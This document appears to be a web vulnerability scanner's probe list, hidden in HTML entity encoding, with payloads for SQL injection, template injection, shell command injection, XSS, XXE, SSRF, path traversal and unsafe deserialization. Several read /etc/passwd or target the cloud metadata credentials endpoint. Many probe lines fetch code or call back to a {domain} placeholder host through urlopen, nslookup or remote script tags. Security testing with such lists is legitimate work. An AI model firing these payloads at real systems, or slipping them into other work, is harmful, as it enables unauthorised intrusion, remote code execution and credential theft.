&#39;&#65;&#78;&#68;&#32;&#49;&#61;&#67;&#79;&#78;&#86;&#69;&#82;&#84;&#40;&#105;&#110;&#116;&#44;&#64;&#64;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#41;&#45;&#45;&#47;&#42;&#39;&#79;&#82;&#32;&#49;&#61;&#101;&#120;&#116;&#114;&#97;&#99;&#116;&#118;&#97;&#108;&#117;&#101;&#40;&#49;&#44;&#99;&#111;&#110;&#99;&#97;&#116;&#40;&#48;&#120;&#55;&#101;&#44;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#40;&#41;&#41;&#41;&#45;&#45;&#42;&#47;&#34;&#79;&#82;&#32;&#67;&#65;&#83;&#84;&#40;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#40;&#41;&#32;&#65;&#83;&#32;&#105;&#110;&#116;&#41;&#45;&#45;
&#39;&#85;&#78;&#73;&#79;&#78;&#32;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#55;&#42;&#49;&#57;&#49;&#45;&#45;&#47;&#42;&#39;&#85;&#78;&#73;&#79;&#78;&#32;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#55;&#42;&#49;&#57;&#49;&#44;&#55;&#42;&#49;&#57;&#49;&#45;&#45;&#42;&#47;&#34;&#85;&#78;&#73;&#79;&#78;&#32;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#55;&#42;&#49;&#57;&#49;&#44;&#55;&#42;&#49;&#57;&#49;&#44;&#55;&#42;&#49;&#57;&#49;&#45;&#45;
&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#47;&#42;&#39;&#88;&#79;&#82;&#40;&#73;&#70;&#40;&#49;&#61;&#49;&#44;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#44;&#48;&#41;&#41;&#79;&#82;&#39;&#34;&#88;&#79;&#82;&#40;&#73;&#70;&#40;&#49;&#61;&#49;&#44;&#83;&#76;&#69;&#69;&#80;&#40;&#53;&#41;&#44;&#48;&#41;&#41;&#79;&#82;&#34;&#42;&#47;
&#39;&#59;&#69;&#88;&#69;&#67;&#32;&#109;&#97;&#115;&#116;&#101;&#114;&#46;&#46;&#120;&#112;&#95;&#100;&#105;&#114;&#116;&#114;&#101;&#101;&#32;&#39;&#92;&#92;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#92;&#97;&#39;&#45;&#45;&#47;&#42;&#39;&#79;&#82;&#32;&#76;&#79;&#65;&#68;&#95;&#70;&#73;&#76;&#69;&#40;&#39;&#92;&#92;&#92;&#92;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#92;&#92;&#97;&#39;&#41;&#79;&#82;&#39;&#42;&#47;&#34;&#79;&#82;&#40;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#100;&#98;&#108;&#105;&#110;&#107;&#95;&#115;&#101;&#110;&#100;&#95;&#113;&#117;&#101;&#114;&#121;&#40;&#39;&#104;&#111;&#115;&#116;&#61;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#39;&#44;&#39;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#49;&#39;&#41;&#41;&#45;&#45;
&#123;&#123;&#55;&#42;&#49;&#57;&#49;&#125;&#125;&#36;&#123;&#55;&#42;&#49;&#57;&#49;&#125;&#60;&#37;&#61;&#32;&#55;&#42;&#49;&#57;&#49;&#32;&#37;&#62;&#36;&#123;&#123;&#55;&#42;&#49;&#57;&#49;&#125;&#125;&#35;&#123;&#55;&#42;&#49;&#57;&#49;&#125;&#35;&#115;&#101;&#116;&#40;&#36;&#120;&#61;&#55;&#42;&#49;&#57;&#49;&#41;&#36;&#120;&#91;&#61;&#55;&#42;&#49;&#57;&#49;&#93;&#64;&#40;&#55;&#42;&#49;&#57;&#49;&#41;
&#36;&#123;&#123;&#60;&#37;&#91;&#37;&#39;&#34;&#125;&#125;&#37;&#92;
&#123;&#123;&#95;&#95;&#105;&#109;&#112;&#111;&#114;&#116;&#95;&#95;&#40;&#39;&#116;&#105;&#109;&#101;&#39;&#41;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#41;&#125;&#125;&#36;&#123;&#84;&#40;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#84;&#104;&#114;&#101;&#97;&#100;&#41;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#48;&#48;&#48;&#41;&#125;&#60;&#37;&#61;&#32;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#41;&#32;&#37;&#62;&#36;&#123;&#123;&#84;&#40;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#84;&#104;&#114;&#101;&#97;&#100;&#41;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#48;&#48;&#48;&#41;&#125;&#125;
&#123;&#123;&#95;&#95;&#105;&#109;&#112;&#111;&#114;&#116;&#95;&#95;&#40;&#39;&#117;&#114;&#108;&#108;&#105;&#98;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#39;&#41;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#117;&#114;&#108;&#111;&#112;&#101;&#110;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#115;&#115;&#116;&#105;&#39;&#41;&#125;&#125;&#36;&#123;&#84;&#40;&#106;&#97;&#118;&#97;&#46;&#110;&#101;&#116;&#46;&#85;&#82;&#76;&#41;&#46;&#110;&#101;&#119;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#115;&#115;&#116;&#105;&#39;&#41;&#46;&#111;&#112;&#101;&#110;&#83;&#116;&#114;&#101;&#97;&#109;&#40;&#41;&#125;&#60;&#37;&#61;&#32;&#114;&#101;&#113;&#117;&#105;&#114;&#101;&#40;&#39;&#110;&#101;&#116;&#47;&#104;&#116;&#116;&#112;&#39;&#41;&#59;&#78;&#101;&#116;&#58;&#58;&#72;&#84;&#84;&#80;&#46;&#103;&#101;&#116;&#40;&#85;&#82;&#73;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#115;&#115;&#116;&#105;&#39;&#41;&#41;&#32;&#37;&#62;
&#59;&#115;&#108;&#101;&#101;&#112;&#32;&#53;&#32;&#35;&#39;&#124;&#115;&#108;&#101;&#101;&#112;&#32;&#53;&#124;&#34;&#36;&#40;&#115;&#108;&#101;&#101;&#112;&#32;&#53;&#41;&#96;&#115;&#108;&#101;&#101;&#112;&#32;&#53;&#96;
&#59;&#101;&#99;&#104;&#111;&#32;&#36;&#40;&#40;&#55;&#42;&#49;&#57;&#49;&#41;&#41;&#32;&#35;&#39;&#124;&#101;&#120;&#112;&#114;&#32;&#55;&#32;&#92;&#42;&#32;&#49;&#57;&#49;&#124;&#34;&#36;&#40;&#101;&#99;&#104;&#111;&#32;&#36;&#40;&#40;&#55;&#42;&#49;&#57;&#49;&#41;&#41;&#41;&#96;&#101;&#120;&#112;&#114;&#32;&#55;&#32;&#92;&#42;&#32;&#49;&#57;&#49;&#96;
&#59;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#32;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#32;&#35;&#39;&#124;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#32;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#124;&#34;&#36;&#40;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#32;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#41;&#96;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#32;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#96;
&#55;&#42;&#49;&#57;&#49;
&#95;&#95;&#105;&#109;&#112;&#111;&#114;&#116;&#95;&#95;&#40;&#39;&#116;&#105;&#109;&#101;&#39;&#41;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#41;
&#95;&#95;&#105;&#109;&#112;&#111;&#114;&#116;&#95;&#95;&#40;&#39;&#117;&#114;&#108;&#108;&#105;&#98;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#39;&#41;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#117;&#114;&#108;&#111;&#112;&#101;&#110;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#112;&#121;&#101;&#118;&#97;&#108;&#39;&#41;
&#39;&#34;&#62;&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#51;&#51;&#55;&#41;&#62;&#60;&#33;&#45;&#45;
&#39;&#34;&#62;&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#32;&#115;&#114;&#99;&#61;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#120;&#46;&#106;&#115;&#62;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#51;&#51;&#55;&#41;&#62;&#60;&#33;&#45;&#45;
&#60;&#63;&#120;&#109;&#108;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#48;&#34;&#63;&#62;&#60;&#33;&#68;&#79;&#67;&#84;&#89;&#80;&#69;&#32;&#102;&#111;&#111;&#32;&#91;&#60;&#33;&#69;&#78;&#84;&#73;&#84;&#89;&#32;&#120;&#120;&#101;&#32;&#83;&#89;&#83;&#84;&#69;&#77;&#32;&#34;&#102;&#105;&#108;&#101;&#58;&#47;&#47;&#47;&#101;&#116;&#99;&#47;&#112;&#97;&#115;&#115;&#119;&#100;&#34;&#62;&#93;&#62;&#60;&#102;&#111;&#111;&#62;&#38;&#120;&#120;&#101;&#59;&#60;&#47;&#102;&#111;&#111;&#62;
&#60;&#63;&#120;&#109;&#108;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#48;&#34;&#63;&#62;&#60;&#33;&#68;&#79;&#67;&#84;&#89;&#80;&#69;&#32;&#102;&#111;&#111;&#32;&#91;&#60;&#33;&#69;&#78;&#84;&#73;&#84;&#89;&#32;&#120;&#120;&#101;&#32;&#83;&#89;&#83;&#84;&#69;&#77;&#32;&#34;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#120;&#120;&#101;&#34;&#62;&#93;&#62;&#60;&#102;&#111;&#111;&#62;&#38;&#120;&#120;&#101;&#59;&#60;&#47;&#102;&#111;&#111;&#62;
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#49;&#54;&#57;&#46;&#50;&#53;&#52;&#46;&#49;&#54;&#57;&#46;&#50;&#53;&#52;&#47;&#108;&#97;&#116;&#101;&#115;&#116;&#47;&#109;&#101;&#116;&#97;&#45;&#100;&#97;&#116;&#97;&#47;&#105;&#97;&#109;&#47;&#115;&#101;&#99;&#117;&#114;&#105;&#116;&#121;&#45;&#99;&#114;&#101;&#100;&#101;&#110;&#116;&#105;&#97;&#108;&#115;&#47;
&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#115;&#115;&#114;&#102;
&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#115;&#115;&#114;&#102;
&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;&#101;&#116;&#99;&#47;&#112;&#97;&#115;&#115;&#119;&#100;
&#114;&#101;&#116;&#117;&#114;&#110;&#32;&#55;&#42;&#49;&#57;&#49;
&#123;&#34;&#36;&#103;&#116;&#34;&#58;&#34;&#34;&#44;&#34;&#36;&#110;&#101;&#34;&#58;&#34;&#34;&#125;
&#36;&#123;&#55;&#42;&#49;&#57;&#49;&#125;
&#123;&#34;&#95;&#95;&#112;&#114;&#111;&#116;&#111;&#95;&#95;&#34;&#58;&#123;&#34;&#112;&#111;&#108;&#108;&#117;&#116;&#101;&#100;&#34;&#58;&#49;&#51;&#51;&#55;&#125;&#125;
&#37;&#48;&#100;&#37;&#48;&#97;&#88;&#45;&#73;&#110;&#106;&#101;&#99;&#116;&#101;&#100;&#58;&#49;&#51;&#51;&#55;&#37;&#48;&#100;&#37;&#48;&#97;
&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;&#37;&#115;
&#60;&#33;&#45;&#45;&#35;&#115;&#101;&#116;&#32;&#118;&#97;&#114;&#61;&#34;&#120;&#34;&#32;&#118;&#97;&#108;&#117;&#101;&#61;&#34;&#49;&#51;&#51;&#55;&#34;&#32;&#45;&#45;&#62;&#60;&#33;&#45;&#45;&#35;&#101;&#99;&#104;&#111;&#32;&#118;&#97;&#114;&#61;&#34;&#120;&#34;&#32;&#45;&#45;&#62;
&#42;&#41;&#40;&#99;&#110;&#61;&#42;&#41;&#41;&#40;&#124;&#40;&#99;&#110;&#61;&#42;
&#42;&#41;&#40;&#117;&#105;&#100;&#61;&#49;&#51;&#51;&#55;&#41;&#40;&#38;&#40;&#111;&#98;&#106;&#101;&#99;&#116;&#67;&#108;&#97;&#115;&#115;&#61;&#42;
&#60;&#120;&#115;&#108;&#58;&#118;&#97;&#108;&#117;&#101;&#45;&#111;&#102;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#61;&#34;&#55;&#42;&#49;&#57;&#49;&#34;&#47;&#62;
&#60;&#120;&#115;&#108;&#58;&#118;&#97;&#108;&#117;&#101;&#45;&#111;&#102;&#32;&#115;&#101;&#108;&#101;&#99;&#116;&#61;&#34;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#120;&#115;&#108;&#116;&#39;&#41;&#34;&#47;&#62;
&#60;&#120;&#115;&#108;&#58;&#105;&#110;&#118;&#97;&#108;&#105;&#100;&#47;&#62;
&#123;&#34;&#113;&#117;&#101;&#114;&#121;&#34;&#58;&#123;&#34;&#105;&#110;&#118;&#97;&#108;&#105;&#100;&#95;&#113;&#117;&#101;&#114;&#121;&#95;&#116;&#121;&#112;&#101;&#34;&#58;&#123;&#125;&#125;&#125;
&#123;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#95;&#102;&#105;&#101;&#108;&#100;&#115;&#34;&#58;&#123;&#34;&#120;&#34;&#58;&#123;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#58;&#34;&#55;&#42;&#49;&#57;&#49;&#34;&#125;&#125;&#125;
&#39;&#32;&#79;&#82;&#32;&#49;&#61;&#49;&#32;&#82;&#69;&#84;&#85;&#82;&#78;&#32;&#55;&#42;&#49;&#57;&#49;&#32;&#47;&#47;
&#39;&#32;&#79;&#82;&#32;&#49;&#61;&#49;&#32;&#87;&#73;&#84;&#72;&#32;&#49;&#32;&#65;&#83;&#32;&#120;&#32;&#67;&#65;&#76;&#76;&#32;&#97;&#112;&#111;&#99;&#46;&#117;&#116;&#105;&#108;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#48;&#48;&#48;&#41;&#32;&#82;&#69;&#84;&#85;&#82;&#78;&#32;&#120;&#32;&#47;&#47;
&#123;&#34;&#115;&#101;&#108;&#101;&#99;&#116;&#111;&#114;&#34;&#58;&#123;&#34;&#36;&#105;&#110;&#118;&#97;&#108;&#105;&#100;&#95;&#111;&#112;&#34;&#58;&#34;&#116;&#101;&#115;&#116;&#34;&#125;&#125;
&#110;&#101;&#119;&#32;&#71;&#114;&#111;&#111;&#118;&#121;&#83;&#104;&#101;&#108;&#108;&#40;&#41;&#46;&#101;&#118;&#97;&#108;&#117;&#97;&#116;&#101;&#40;&#39;&#55;&#42;&#49;&#57;&#49;&#39;&#41;
&#84;&#104;&#114;&#101;&#97;&#100;&#46;&#115;&#108;&#101;&#101;&#112;&#40;&#53;&#48;&#48;&#48;&#41;
&#110;&#101;&#119;&#32;&#85;&#82;&#76;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#103;&#114;&#111;&#111;&#118;&#121;&#39;&#41;&#46;&#116;&#101;&#120;&#116;
&#89;&#49;&#57;&#102;&#89;&#110;&#86;&#112;&#98;&#72;&#82;&#112;&#98;&#108;&#57;&#102;&#67;&#109;&#86;&#50;&#89;&#87;&#119;&#75;&#75;&#70;&#77;&#110;&#77;&#83;&#56;&#119;&#74;&#119;&#112;&#48;&#85;&#105;&#52;&#61;
&#89;&#49;&#57;&#102;&#89;&#110;&#86;&#112;&#98;&#72;&#82;&#112;&#98;&#108;&#57;&#102;&#67;&#109;&#86;&#50;&#89;&#87;&#119;&#75;&#75;&#70;&#77;&#110;&#78;&#121;&#111;&#120;&#79;&#84;&#69;&#110;&#67;&#110;&#82;&#83;&#76;&#103;&#61;&#61;
&#89;&#51;&#82;&#112;&#98;&#87;&#85;&#75;&#99;&#50;&#120;&#108;&#90;&#88;&#65;&#75;&#75;&#69;&#107;&#49;&#67;&#110;&#82;&#83;&#76;&#103;&#61;&#61;
&#89;&#49;&#57;&#102;&#89;&#110;&#86;&#112;&#98;&#72;&#82;&#112;&#98;&#108;&#57;&#102;&#67;&#109;&#86;&#50;&#89;&#87;&#119;&#75;&#75;&#70;&#77;&#110;&#88;&#49;&#57;&#112;&#98;&#88;&#66;&#118;&#99;&#110;&#82;&#102;&#88;&#121;&#103;&#105;&#100;&#88;&#74;&#115;&#98;&#71;&#108;&#105;&#76;&#110;&#74;&#108;&#99;&#88;&#86;&#108;&#99;&#51;&#81;&#105;&#75;&#83;&#53;&#121;&#90;&#88;&#70;&#49;&#90;&#88;&#78;&#48;&#76;&#110;&#86;&#121;&#98;&#71;&#57;&#119;&#90;&#87;&#52;&#111;&#73;&#109;&#104;&#48;&#100;&#72;&#65;&#54;&#76;&#121;&#57;&#55;&#90;&#71;&#57;&#116;&#89;&#87;&#108;&#117;&#102;&#83;&#57;&#119;&#97;&#87;&#78;&#114;&#98;&#71;&#85;&#105;&#75;&#83;&#99;&#75;&#100;&#70;&#73;&#117;
&#33;&#33;&#112;&#121;&#116;&#104;&#111;&#110;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#47;&#97;&#112;&#112;&#108;&#121;&#58;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#118;&#97;&#108;&#32;&#91;&#34;&#49;&#47;&#48;&#34;&#93;
&#33;&#33;&#112;&#121;&#116;&#104;&#111;&#110;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#47;&#97;&#112;&#112;&#108;&#121;&#58;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#118;&#97;&#108;&#32;&#91;&#34;&#55;&#42;&#49;&#57;&#49;&#34;&#93;
&#33;&#33;&#112;&#121;&#116;&#104;&#111;&#110;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#47;&#97;&#112;&#112;&#108;&#121;&#58;&#116;&#105;&#109;&#101;&#46;&#115;&#108;&#101;&#101;&#112;&#32;&#91;&#53;&#93;
&#33;&#33;&#112;&#121;&#116;&#104;&#111;&#110;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#47;&#97;&#112;&#112;&#108;&#121;&#58;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#120;&#101;&#99;&#32;&#91;&#34;&#105;&#109;&#112;&#111;&#114;&#116;&#32;&#117;&#114;&#108;&#108;&#105;&#98;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#59;&#117;&#114;&#108;&#108;&#105;&#98;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#117;&#114;&#108;&#111;&#112;&#101;&#110;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#121;&#97;&#109;&#108;&#39;&#41;&#34;&#93;
&#123;&#34;&#112;&#121;&#47;&#114;&#101;&#100;&#117;&#99;&#101;&#34;&#58;&#91;&#123;&#34;&#112;&#121;&#47;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#34;&#58;&#34;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#118;&#97;&#108;&#34;&#125;&#44;&#123;&#34;&#112;&#121;&#47;&#116;&#117;&#112;&#108;&#101;&#34;&#58;&#91;&#34;&#49;&#47;&#48;&#34;&#93;&#125;&#93;&#125;
&#123;&#34;&#112;&#121;&#47;&#114;&#101;&#100;&#117;&#99;&#101;&#34;&#58;&#91;&#123;&#34;&#112;&#121;&#47;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#34;&#58;&#34;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#118;&#97;&#108;&#34;&#125;&#44;&#123;&#34;&#112;&#121;&#47;&#116;&#117;&#112;&#108;&#101;&#34;&#58;&#91;&#34;&#55;&#42;&#49;&#57;&#49;&#34;&#93;&#125;&#93;&#125;
&#123;&#34;&#112;&#121;&#47;&#114;&#101;&#100;&#117;&#99;&#101;&#34;&#58;&#91;&#123;&#34;&#112;&#121;&#47;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#34;&#58;&#34;&#116;&#105;&#109;&#101;&#46;&#115;&#108;&#101;&#101;&#112;&#34;&#125;&#44;&#123;&#34;&#112;&#121;&#47;&#116;&#117;&#112;&#108;&#101;&#34;&#58;&#91;&#53;&#93;&#125;&#93;&#125;
&#123;&#34;&#112;&#121;&#47;&#114;&#101;&#100;&#117;&#99;&#101;&#34;&#58;&#91;&#123;&#34;&#112;&#121;&#47;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#34;&#58;&#34;&#98;&#117;&#105;&#108;&#116;&#105;&#110;&#115;&#46;&#101;&#118;&#97;&#108;&#34;&#125;&#44;&#123;&#34;&#112;&#121;&#47;&#116;&#117;&#112;&#108;&#101;&#34;&#58;&#91;&#34;&#95;&#95;&#105;&#109;&#112;&#111;&#114;&#116;&#95;&#95;&#40;&#39;&#117;&#114;&#108;&#108;&#105;&#98;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#39;&#41;&#46;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#117;&#114;&#108;&#111;&#112;&#101;&#110;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#106;&#115;&#111;&#110;&#112;&#105;&#99;&#107;&#108;&#101;&#39;&#41;&#34;&#93;&#125;&#93;&#125;
&#123;&#34;&#114;&#99;&#101;&#34;&#58;&#34;&#95;&#36;&#36;&#78;&#68;&#95;&#70;&#85;&#78;&#67;&#36;&#36;&#95;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#116;&#104;&#114;&#111;&#119;&#32;&#110;&#101;&#119;&#32;&#69;&#114;&#114;&#111;&#114;&#40;&#49;&#51;&#51;&#55;&#41;&#125;&#40;&#41;&#34;&#125;
&#123;&#34;&#114;&#99;&#101;&#34;&#58;&#34;&#95;&#36;&#36;&#78;&#68;&#95;&#70;&#85;&#78;&#67;&#36;&#36;&#95;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#114;&#101;&#116;&#117;&#114;&#110;&#32;&#55;&#42;&#49;&#57;&#49;&#125;&#40;&#41;&#34;&#125;
&#123;&#34;&#114;&#99;&#101;&#34;&#58;&#34;&#95;&#36;&#36;&#78;&#68;&#95;&#70;&#85;&#78;&#67;&#36;&#36;&#95;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#118;&#97;&#114;&#32;&#100;&#61;&#68;&#97;&#116;&#101;&#46;&#110;&#111;&#119;&#40;&#41;&#43;&#53;&#48;&#48;&#48;&#59;&#119;&#104;&#105;&#108;&#101;&#40;&#68;&#97;&#116;&#101;&#46;&#110;&#111;&#119;&#40;&#41;&#60;&#100;&#41;&#123;&#125;&#125;&#40;&#41;&#34;&#125;
&#123;&#34;&#114;&#99;&#101;&#34;&#58;&#34;&#95;&#36;&#36;&#78;&#68;&#95;&#70;&#85;&#78;&#67;&#36;&#36;&#95;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#114;&#101;&#113;&#117;&#105;&#114;&#101;&#40;&#39;&#104;&#116;&#116;&#112;&#39;&#41;&#46;&#103;&#101;&#116;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#110;&#111;&#100;&#101;&#115;&#101;&#114;&#39;&#41;&#125;&#40;&#41;&#34;&#125;
&#33;&#33;&#105;&#110;&#118;&#97;&#108;&#105;&#100;&#95;&#116;&#97;&#103;&#95;&#112;&#114;&#111;&#98;&#101;&#32;&#49;&#51;&#51;&#55;
&#123;&#34;&#102;&#110;&#34;&#58;&#123;&#34;&#95;&#95;&#106;&#115;&#95;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#34;&#58;&#34;&#102;&#117;&#110;&#99;&#116;&#105;&#111;&#110;&#40;&#41;&#123;&#114;&#101;&#116;&#117;&#114;&#110;&#32;&#55;&#42;&#49;&#57;&#49;&#125;&#34;&#125;&#125;
&#79;&#58;&#57;&#57;&#57;&#57;&#58;&#34;&#78;&#111;&#110;&#69;&#120;&#105;&#115;&#116;&#34;&#58;&#48;&#58;&#123;&#125;
&#45;&#45;&#45;&#32;&#33;&#114;&#117;&#98;&#121;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#58;&#78;&#111;&#110;&#69;&#120;&#105;&#115;&#116;&#101;&#110;&#116;&#67;&#108;&#97;&#115;&#115;&#49;&#51;&#51;&#55;&#92;&#110;&#105;&#58;&#32;&#120;
&#66;&#65;&#106;&#47;&#65;&#65;&#65;&#65;
&#99;&#72;&#78;&#48;&#77;&#80;&#47;&#47;&#47;&#119;&#81;&#65;
&#45;&#45;&#45;&#32;&#123;&#123;&#123;&#105;&#110;&#118;&#97;&#108;&#105;&#100;&#32;&#121;&#97;&#109;&#108;&#32;&#49;&#51;&#51;&#55;
&#114;&#79;&#48;&#65;&#66;&#88;&#78;&#121;&#65;&#66;&#70;&#113;&#89;&#88;&#90;&#104;&#76;&#110;&#86;&#48;&#97;&#87;&#119;&#117;&#83;&#71;&#70;&#122;&#97;&#70;&#78;&#108;&#100;&#65;&#61;&#61;
&#33;&#33;&#99;&#111;&#109;&#46;&#110;&#111;&#110;&#101;&#120;&#105;&#115;&#116;&#101;&#110;&#116;&#46;&#70;&#97;&#107;&#101;&#67;&#108;&#97;&#115;&#115;&#49;&#51;&#51;&#55;&#32;&#123;&#125;
&#91;&#34;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#120;&#97;&#108;&#97;&#110;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#120;&#115;&#108;&#116;&#99;&#46;&#116;&#114;&#97;&#120;&#46;&#84;&#101;&#109;&#112;&#108;&#97;&#116;&#101;&#115;&#73;&#109;&#112;&#108;&#34;&#44;&#123;&#34;&#116;&#114;&#97;&#110;&#115;&#108;&#101;&#116;&#66;&#121;&#116;&#101;&#99;&#111;&#100;&#101;&#115;&#34;&#58;&#91;&#34;&#121;&#118;&#54;&#54;&#118;&#103;&#61;&#61;&#34;&#93;&#44;&#34;&#116;&#114;&#97;&#110;&#115;&#108;&#101;&#116;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#97;&#34;&#44;&#34;&#111;&#117;&#116;&#112;&#117;&#116;&#80;&#114;&#111;&#112;&#101;&#114;&#116;&#105;&#101;&#115;&#34;&#58;&#123;&#125;&#125;&#93;
